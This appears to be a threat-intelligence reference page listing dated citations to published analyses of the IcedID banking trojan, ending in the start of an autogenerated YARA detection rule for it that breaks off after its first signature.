@online{centeno:20210412:spike:d67dcb0, author = {Raphael Centeno and Don Ovid Ladores and Lala Manly and Junestherry Salvador and Frankylnn Uy}, title = {{A Spike in BazarCall and IcedID Activity Detected in March}}, date = {2021-04-12}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html}, language = {English}, urldate = {2021-04-14} } A Spike in BazarCall and IcedID Activity Detected in March
BazarBackdoor IcedID
2021-04-114rchibld4rchibld
@online{4rchibld:20210411:icedid:4135c21, author = {4rchibld}, title = {{IcedID on my neck I’m the coolest}}, date = {2021-04-11}, organization = {4rchibld}, url = {https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/}, language = {English}, urldate = {2021-05-11} } IcedID on my neck I’m the coolest
IcedID
2021-04-10Youtube (AhmedS Kasmani)AhmedS Kasmani
@online{kasmani:20210410:malware:e2000de, author = {AhmedS Kasmani}, title = {{Malware Analysis: IcedID Banking Trojan JavaScript Dropper}}, date = {2021-04-10}, organization = {Youtube (AhmedS Kasmani)}, url = {https://www.youtube.com/watch?v=oZ4bwnjcXWg}, language = {English}, urldate = {2021-04-12} } Malware Analysis: IcedID Banking Trojan JavaScript Dropper
IcedID
2021-04-09MicrosoftEmily Hacker, Justin Carroll, Microsoft 365 Defender Threat Intelligence Team
@online{hacker:20210409:investigating:2b6f30a, author = {Emily Hacker and Justin Carroll and Microsoft 365 Defender Threat Intelligence Team}, title = {{Investigating a unique “form” of email delivery for IcedID malware}}, date = {2021-04-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/}, language = {English}, urldate = {2021-04-12} } Investigating a unique “form” of email delivery for IcedID malware
IcedID
2021-04-09aaqeel01Ali Aqeel
@online{aqeel:20210409:icedid:a6e3243, author = {Ali Aqeel}, title = {{IcedID Analysis}}, date = {2021-04-09}, organization = {aaqeel01}, url = {https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/}, language = {English}, urldate = {2021-04-12} } IcedID Analysis
IcedID
2021-04-07MinervaMinerva Labs
@online{labs:20210407:icedid:d178d16, author = {Minerva Labs}, title = {{IcedID - A New Threat In Office Attachments}}, date = {2021-04-07}, organization = {Minerva}, url = {https://blog.minerva-labs.com/icedid-maas}, language = {English}, urldate = {2021-04-09} } IcedID - A New Threat In Office Attachments
IcedID
2021-04-07UptycsAshwin Vamshi, Abhijit Mohanta
@online{vamshi:20210407:icedid:bbda303, author = {Ashwin Vamshi and Abhijit Mohanta}, title = {{IcedID campaign spotted being spiced with Excel 4 Macros}}, date = {2021-04-07}, organization = {Uptycs}, url = {https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros}, language = {English}, urldate = {2021-04-09} } IcedID campaign spotted being spiced with Excel 4 Macros
IcedID
2021-04-01Reversing LabsRobert Simmons
@online{simmons:20210401:code:885c081, author = {Robert Simmons}, title = {{Code Reuse Across Packers and DLL Loaders}}, date = {2021-04-01}, organization = {Reversing Labs}, url = {https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders}, language = {English}, urldate = {2021-04-09} } Code Reuse Across Packers and DLL Loaders
IcedID SystemBC
2021-03-31Red CanaryRed Canary
@techreport{canary:20210331:2021:cd81f2d, author = {Red Canary}, title = {{2021 Threat Detection Report}}, date = {2021-03-31}, institution = {Red Canary}, url = {https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf}, language = {English}, urldate = {2021-04-06} } 2021 Threat Detection Report
Shlayer Andromeda Cobalt Strike Dridex Emotet IcedID MimiKatz QakBot TrickBot
2021-03-29The DFIR ReportThe DFIR Report
@online{report:20210329:sodinokibi:4c63e20, author = {The DFIR Report}, title = {{Sodinokibi (aka REvil) Ransomware}}, date = {2021-03-29}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/}, language = {English}, urldate = {2021-03-30} } Sodinokibi (aka REvil) Ransomware
Cobalt Strike IcedID REvil
2021-03-12Binary DefenseJames Quinn
@online{quinn:20210312:icedid:3e6db43, author = {James Quinn}, title = {{IcedID GZIPLOADER Analysis}}, date = {2021-03-12}, organization = {Binary Defense}, url = {https://www.binarydefense.com/icedid-gziploader-analysis/}, language = {English}, urldate = {2021-03-16} } IcedID GZIPLOADER Analysis
IcedID
2021-03-04F5Dor Nizar, Roy Moshailov
@online{nizar:20210304:icedid:bfcc689, author = {Dor Nizar and Roy Moshailov}, title = {{IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims}}, date = {2021-03-04}, organization = {F5}, url = {https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims}, language = {English}, urldate = {2021-03-06} } IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims
IcedID
2021-03Group-IBOleg Skulkin, Roman Rezvukhin, Semyon Rogachev
@techreport{skulkin:202103:ransomware:992ca10, author = {Oleg Skulkin and Roman Rezvukhin and Semyon Rogachev}, title = {{Ransomware Uncovered 2020/2021}}, date = {2021-03}, institution = {Group-IB}, url = {https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf}, language = {English}, urldate = {2021-06-16} } Ransomware Uncovered 2020/2021
RansomEXX BazarBackdoor Buer Clop Conti DoppelPaymer Dridex Egregor IcedID Maze PwndLocker QakBot RansomEXX REvil Ryuk SDBbot TrickBot Zloader
2021-02-26CrowdStrikeEric Loui, Sergei Frankoff
@online{loui:20210226:hypervisor:8dadf9c, author = {Eric Loui and Sergei Frankoff}, title = {{Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact}}, date = {2021-02-26}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout}, language = {English}, urldate = {2021-05-26} } Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact
DarkSide RansomEXX Griffon Carbanak Cobalt Strike DarkSide IcedID MimiKatz PyXie RansomEXX REvil
2021-02-25FireEyeBryce Abdo, Brendan McKeague, Van Ta
@online{abdo:20210225:so:88f3400, author = {Bryce Abdo and Brendan McKeague and Van Ta}, title = {{So Unchill: Melting UNC2198 ICEDID to Ransomware Operations}}, date = {2021-02-25}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html}, language = {English}, urldate = {2021-03-02} } So Unchill: Melting UNC2198 ICEDID to Ransomware Operations
MOUSEISLAND Cobalt Strike Egregor IcedID Maze SystemBC
2021-02-23CrowdStrikeCrowdStrike
@techreport{crowdstrike:20210223:2021:bf5bc4f, author = {CrowdStrike}, title = {{2021 Global Threat Report}}, date = {2021-02-23}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf}, language = {English}, urldate = {2021-02-25} } 2021 Global Threat Report
RansomEXX Amadey Anchor Avaddon BazarBackdoor Clop Cobalt Strike Conti Cutwail DanaBot DarkSide DoppelPaymer Dridex Egregor Emotet Hakbit IcedID JSOutProx KerrDown LockBit Mailto Maze MedusaLocker Mespinoza Mount Locker NedDnLoader Nemty Pay2Key PlugX Pushdo PwndLocker PyXie QakBot Quasar RAT RagnarLocker Ragnarok RansomEXX REvil Ryuk Sekhmet ShadowPad SmokeLoader Snake SUNBURST SunCrypt TEARDROP TrickBot WastedLocker Winnti Zloader KNOCKOUT SPIDER OUTLAW SPIDER RIDDLE SPIDER SOLAR SPIDER VIKING SPIDER
2021-02-03Mimecast, Nettitude
@techreport{mimecast:20210203:ta551shathak:4bd9a01, author = {Mimecast and Nettitude}, title = {{TA551/Shathak Threat Research}}, date = {2021-02-03}, institution = {}, url = {https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf}, language = {English}, urldate = {2021-05-26} } TA551/Shathak Threat Research
IcedID
2021-02-02CRONUPGermán Fernández
@online{fernndez:20210202:de:6ff4f3a, author = {Germán Fernández}, title = {{De ataque con Malware a incidente de Ransomware}}, date = {2021-02-02}, organization = {CRONUP}, url = {https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware}, language = {Spanish}, urldate = {2021-03-02} } De ataque con Malware a incidente de Ransomware
Avaddon BazarBackdoor Buer Clop Cobalt Strike Conti DanaBot Dharma Dridex Egregor Emotet Empire Downloader FriedEx GootKit IcedID MegaCortex Nemty Phorpiex PwndLocker PyXie QakBot RansomEXX REvil Ryuk SDBbot SmokeLoader TrickBot Zloader
2021-01-19Medium elis531989Eli Salem
@online{salem:20210119:funtastic:42f9250, author = {Eli Salem}, title = {{Funtastic Packers And Where To Find Them}}, date = {2021-01-19}, organization = {Medium elis531989}, url = {https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7}, language = {English}, urldate = {2021-01-21} } Funtastic Packers And Where To Find Them
Get2 IcedID QakBot
2021-01-19Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20210119:wireshark:be0c831, author = {Brad Duncan}, title = {{Wireshark Tutorial: Examining Emotet Infection Traffic}}, date = {2021-01-19}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/}, language = {English}, urldate = {2021-01-21} } Wireshark Tutorial: Examining Emotet Infection Traffic
Emotet GootKit IcedID QakBot TrickBot
2021-01-18tccontre Blogtcontre
@online{tcontre:20210118:extracting:4935b1c, author = {tcontre}, title = {{Extracting Shellcode in ICEID .PNG Steganography}}, date = {2021-01-18}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2021/01/}, language = {English}, urldate = {2021-01-21} } Extracting Shellcode in ICEID .PNG Steganography
IcedID
2021-01-09Marco Ramilli's BlogMarco Ramilli
@online{ramilli:20210109:command:d720b27, author = {Marco Ramilli}, title = {{Command and Control Traffic Patterns}}, date = {2021-01-09}, organization = {Marco Ramilli's Blog}, url = {https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/}, language = {English}, urldate = {2021-05-17} } Command and Control Traffic Patterns
ostap LaZagne Agent Tesla Azorult Buer Cobalt Strike DanaBot DarkComet Dridex Emotet Formbook IcedID ISFB NetWire RC PlugX Quasar RAT SmokeLoader TrickBot
2021-01-07Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20210107:ta551:6346c62, author = {Brad Duncan}, title = {{TA551: Email Attack Campaign Switches from Valak to IcedID}}, date = {2021-01-07}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/ta551-shathak-icedid/}, language = {English}, urldate = {2021-01-11} } TA551: Email Attack Campaign Switches from Valak to IcedID
IcedID
2020-12-10NRI SECURENeoSOC
@online{neosoc:20201210:icedid:b05d899, author = {NeoSOC}, title = {{マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説}}, date = {2020-12-10}, organization = {NRI SECURE}, url = {https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid}, language = {Japanese}, urldate = {2020-12-11} } マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説
IcedID
2020-12-09CiscoDavid Liebenberg, Caitlin Huey
@online{liebenberg:20201209:quarterly:9ed3062, author = {David Liebenberg and Caitlin Huey}, title = {{Quarterly Report: Incident Response trends from Fall 2020}}, date = {2020-12-09}, organization = {Cisco}, url = {https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html}, language = {English}, urldate = {2020-12-10} } Quarterly Report: Incident Response trends from Fall 2020
Cobalt Strike IcedID Maze RansomEXX Ryuk
2020-12-09MicrosoftMicrosoft 365 Defender Research Team
@online{team:20201209:edr:c8811f1, author = {Microsoft 365 Defender Research Team}, title = {{EDR in block mode stops IcedID cold}}, date = {2020-12-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/}, language = {English}, urldate = {2020-12-11} } EDR in block mode stops IcedID cold
IcedID
2020-12-02CyberIntCyberint Research
@online{research:20201202:icedid:d43e06d, author = {Cyberint Research}, title = {{IcedID Stealer Man-in-the-browser Banking Trojan}}, date = {2020-12-02}, organization = {CyberInt}, url = {https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan}, language = {English}, urldate = {2020-12-11} } IcedID Stealer Man-in-the-browser Banking Trojan
IcedID
2020-11-26CybereasonLior Rochberger, Cybereason Nocturnus
@online{rochberger:20201126:cybereason:8301aeb, author = {Lior Rochberger and Cybereason Nocturnus}, title = {{Cybereason vs. Egregor Ransomware}}, date = {2020-11-26}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware}, language = {English}, urldate = {2020-12-08} } Cybereason vs. Egregor Ransomware
Cobalt Strike Egregor IcedID ISFB QakBot
2020-09-29MicrosoftMicrosoft
@techreport{microsoft:20200929:microsoft:6e5d7b0, author = {Microsoft}, title = {{Microsoft Digital Defense Report}}, date = {2020-09-29}, institution = {Microsoft}, url = {https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf}, language = {English}, urldate = {2020-10-05} } Microsoft Digital Defense Report
Emotet IcedID Mailto Maze QakBot REvil RobinHood TrickBot
2020-08-16kienmanowar Blogm4n0w4r
@online{m4n0w4r:20200816:manual:7a970b8, author = {m4n0w4r}, title = {{Manual Unpacking IcedID Write-up}}, date = {2020-08-16}, organization = {kienmanowar Blog}, url = {https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/}, language = {English}, urldate = {2020-08-20} } Manual Unpacking IcedID Write-up
IcedID
2020-08-12JuniperPaul Kimayong
@online{kimayong:20200812:icedid:b40f8b4, author = {Paul Kimayong}, title = {{IcedID Campaign Strikes Back}}, date = {2020-08-12}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back}, language = {English}, urldate = {2020-08-27} } IcedID Campaign Strikes Back
IcedID
2020-08-10tccontre Blogtccontre
@online{tccontre:20200810:learning:8cc052c, author = {tccontre}, title = {{Learning From ICEID loader - Including its Steganography Payload Parsing}}, date = {2020-08-10}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html}, language = {English}, urldate = {2020-08-14} } Learning From ICEID loader - Including its Steganography Payload Parsing
IcedID
2020-07-30SpamhausSpamhaus Malware Labs
@techreport{labs:20200730:spamhaus:038546d, author = {Spamhaus Malware Labs}, title = {{Spamhaus Botnet Threat Update Q2 2020}}, date = {2020-07-30}, institution = {Spamhaus}, url = {https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf}, language = {English}, urldate = {2020-07-30} } Spamhaus Botnet Threat Update Q2 2020
AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader
2020-07-01Cisco TalosNick Biasini, Edmund Brumaghin, Mariano Graziano
@online{biasini:20200701:threat:a726b7e, author = {Nick Biasini and Edmund Brumaghin and Mariano Graziano}, title = {{Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks}}, date = {2020-07-01}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2020/07/valak-emerges.html}, language = {English}, urldate = {2020-08-18} } Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks
Valak IcedID ISFB MyKings Spreader
2020-06-22zero2autoDaniel Bunce
@online{bunce:20200622:unpacking:8a02d84, author = {Daniel Bunce}, title = {{Unpacking Visual Basic Packers – IcedID}}, date = {2020-06-22}, organization = {zero2auto}, url = {https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/}, language = {English}, urldate = {2020-06-24} } Unpacking Visual Basic Packers – IcedID
IcedID
2020-06-18JuniperPaul Kimayong
@online{kimayong:20200618:covid19:4bb5511, author = {Paul Kimayong}, title = {{COVID-19 and FMLA Campaigns used to install new IcedID banking malware}}, date = {2020-06-18}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware}, language = {English}, urldate = {2020-06-23} } COVID-19 and FMLA Campaigns used to install new IcedID banking malware
IcedID
2020-06-17Github (f0wl)Marius Genheimer
@online{genheimer:20200617:deicer:de78cca, author = {Marius Genheimer}, title = {{deICEr: A Go tool for extracting config from IcedID second stage Loaders}}, date = {2020-06-17}, organization = {Github (f0wl)}, url = {https://github.com/f0wl/deICEr}, language = {English}, urldate = {2020-06-18} } deICEr: A Go tool for extracting config from IcedID second stage Loaders
IcedID
2020-05-29Group-IBIvan Pisarev
@online{pisarev:20200529:icedid:9627fda, author = {Ivan Pisarev}, title = {{IcedID: When ice burns through bank accounts}}, date = {2020-05-29}, organization = {Group-IB}, url = {https://www.group-ib.com/blog/icedid}, language = {English}, urldate = {2020-06-02} } IcedID: When ice burns through bank accounts
IcedID
2020-03-04CrowdStrikeCrowdStrike
@techreport{crowdstrike:20200304:2020:818c85f, author = {CrowdStrike}, title = {{2020 CrowdStrike Global Threat Report}}, date = {2020-03-04}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf}, language = {English}, urldate = {2020-07-24} } 2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelDridex DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot Vidar Winnti ANTHROPOID SPIDER APT31 APT39 BlackTech BuhTrap Charming Kitten CLOCKWORK SPIDER DOPPEL SPIDER FIN7 Gamaredon Group Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER PINCHY SPIDER Pirate Panda SALTY SPIDER SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER VICEROY TIGER
2020-02-18Sophos LabsLuca Nagy
@online{nagy:20200218:nearly:8ff363f, author = {Luca Nagy}, title = {{Nearly a quarter of malware now communicates using TLS}}, date = {2020-02-18}, organization = {Sophos Labs}, url = {https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/}, language = {English}, urldate = {2020-02-27} } Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot
2020-01-22Thomas Barabosch
@online{barabosch:20200122:malware:f805475, author = {Thomas Barabosch}, title = {{The malware analyst’s guide to PE timestamps}}, date = {2020-01-22}, url = {https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/}, language = {English}, urldate = {2021-01-25} } The malware analyst’s guide to PE timestamps
Azorult Gozi IcedID ISFB LOLSnif SUNBURST TEARDROP
2020SecureworksSecureWorks
@online{secureworks:2020:gold:65fcc96, author = {SecureWorks}, title = {{GOLD SWATHMORE}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-swathmore}, language = {English}, urldate = {2020-05-23} } GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot LUNAR SPIDER
2019-12-18Github (psrok1)Paweł Srokosz
@online{srokosz:20191218:icedid:05c3255, author = {Paweł Srokosz}, title = {{IcedID PNG Extractor}}, date = {2019-12-18}, organization = {Github (psrok1)}, url = {https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b}, language = {English}, urldate = {2020-01-13} } IcedID PNG Extractor
IcedID
2019-12-12FireEyeChi-en Shen, Oleg Bondarenko
@online{shen:20191212:cyber:e01baca, author = {Chi-en Shen and Oleg Bondarenko}, title = {{Cyber Threat Landscape in Japan – Revealing Threat in the Shadow}}, date = {2019-12-12}, organization = {FireEye}, url = {https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko}, language = {English}, urldate = {2020-04-16} } Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech
2019-12-03MalwarebytesThreat Intelligence Team
@online{team:20191203:new:39b59e1, author = {Threat Intelligence Team}, title = {{New version of IcedID Trojan uses steganographic payloads}}, date = {2019-12-03}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/}, language = {English}, urldate = {2019-12-24} } New version of IcedID Trojan uses steganographic payloads
IcedID
2019-07-09FortinetKai Lu
@online{lu:20190709:deep:90d708f, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection}}, date = {2019-07-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html}, language = {English}, urldate = {2020-01-08} } A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID
2019-06-25Dawid Golak
@online{golak:20190625:icedid:0a3e153, author = {Dawid Golak}, title = {{IcedID aka #Bokbot Analysis with Ghidra}}, date = {2019-06-25}, url = {https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766}, language = {English}, urldate = {2019-12-02} } IcedID aka #Bokbot Analysis with Ghidra
IcedID
2019-06-16FortinetKai Lu
@online{lu:20190616:deep:ba89738, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)}}, date = {2019-06-16}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html}, language = {English}, urldate = {2019-11-27} } A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID
2019-04-04SecurityIntelligenceNir Somech, Limor Kessem
@online{somech:20190404:icedid:54ba40f, author = {Nir Somech and Limor Kessem}, title = {{IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth}}, date = {2019-04-04}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/}, language = {English}, urldate = {2020-01-08} } IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID
2019-03-21CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190321:interception:7e57329, author = {Shaun Hurley and James Scalise}, title = {{Interception: Dissecting BokBot’s “Man in the Browser”}}, date = {2019-03-21}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/}, language = {English}, urldate = {2019-12-20} } Interception: Dissecting BokBot’s “Man in the Browser”
IcedID
2019-02-15CrowdStrikeBrendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak LUNAR SPIDER WIZARD SPIDER
2019-02-06SecurityIntelligenceItzik Chimino, Limor Kessem, Ophir Harpaz
@online{chimino:20190206:icedid:ef0caad, author = {Itzik Chimino and Limor Kessem and Ophir Harpaz}, title = {{IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites}}, date = {2019-02-06}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/}, language = {English}, urldate = {2020-01-08} } IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID
2019-01-03CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190103:digging:5219f6d, author = {Shaun Hurley and James Scalise}, title = {{Digging into BokBot’s Core Module}}, date = {2019-01-03}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/}, language = {English}, urldate = {2019-12-20} } Digging into BokBot’s Core Module
IcedID
2018-11-09Youtube (OALabs)Sean Wilson, Sergei Frankoff
@online{wilson:20181109:reverse:7e90205, author = {Sean Wilson and Sergei Frankoff}, title = {{Reverse Engineering IcedID / Bokbot Malware Part 2}}, date = {2018-11-09}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=7Dk7NkIbVqY}, language = {English}, urldate = {2019-07-09} } Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID
2018-10-26Youtube (OALabs)Sergei Frankoff
@online{frankoff:20181026:unpacking:b6155cc, author = {Sergei Frankoff}, title = {{Unpacking Bokbot / IcedID Malware - Part 1}}, date = {2018-10-26}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=wObF9n2UIAM}, language = {English}, urldate = {2020-01-08} } Unpacking Bokbot / IcedID Malware - Part 1
IcedID
2018-09-07Vitali Kremez
@online{kremez:20180907:lets:8515a2b, author = {Vitali Kremez}, title = {{Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1}}, date = {2018-09-07}, url = {https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html}, language = {English}, urldate = {2020-01-08} } Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID
2018-08-09Fox-ITAlfred Klason
@online{klason:20180809:bokbot:499f316, author = {Alfred Klason}, title = {{Bokbot: The (re)birth of a banker}}, date = {2018-08-09}, organization = {Fox-IT}, url = {https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/}, language = {English}, urldate = {2019-12-20} } Bokbot: The (re)birth of a banker
IcedID Vawtrak
2018-04-10Cisco TalosRoss Gibb, Daphne Galme, Michael Gorelik
@online{gibb:20180410:icedid:f1a3ff2, author = {Ross Gibb and Daphne Galme and Michael Gorelik}, title = {{IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution}}, date = {2018-04-10}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html}, language = {English}, urldate = {2019-12-17} } IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID
2017-11-14Digital GuardianChris Brook
@online{brook:20171114:iceid:5a074d2, author = {Chris Brook}, title = {{IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites}}, date = {2017-11-14}, organization = {Digital Guardian}, url = {https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites}, language = {English}, urldate = {2019-07-10} } IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID
2017-11-13SecurityIntelligenceLimor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
@online{kessem:20171113:new:bb937fd, author = {Limor Kessem and Maor Wiesen and Tal Darsan and Tomer Agayev}, title = {{New Banking Trojan IcedID Discovered by IBM X-Force Research}}, date = {2017-11-13}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/}, language = {English}, urldate = {2019-11-27} } New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader
2017-11-13IntezerJay Rosenberg
@online{rosenberg:20171113:icedid:8dd9da4, author = {Jay Rosenberg}, title = {{IcedID Banking Trojan Shares Code with Pony 2.0 Trojan}}, date = {2017-11-13}, organization = {Intezer}, url = {http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/}, language = {English}, urldate = {2019-12-02} } IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader
Yara Rules
[TLP:WHITE] win_icedid_auto (20220411 | Detects win.icedid.)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.icedid."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_rule_date = "20220405"
        malpedia_hash = "ecd38294bd47d5589be5cd5490dc8bb4804afc2a"
        malpedia_version = "20220411"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { ff15???????? 50 ff15???????? 8bf7 8bc6 eb02 }
            // n = 6, score = 1300
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
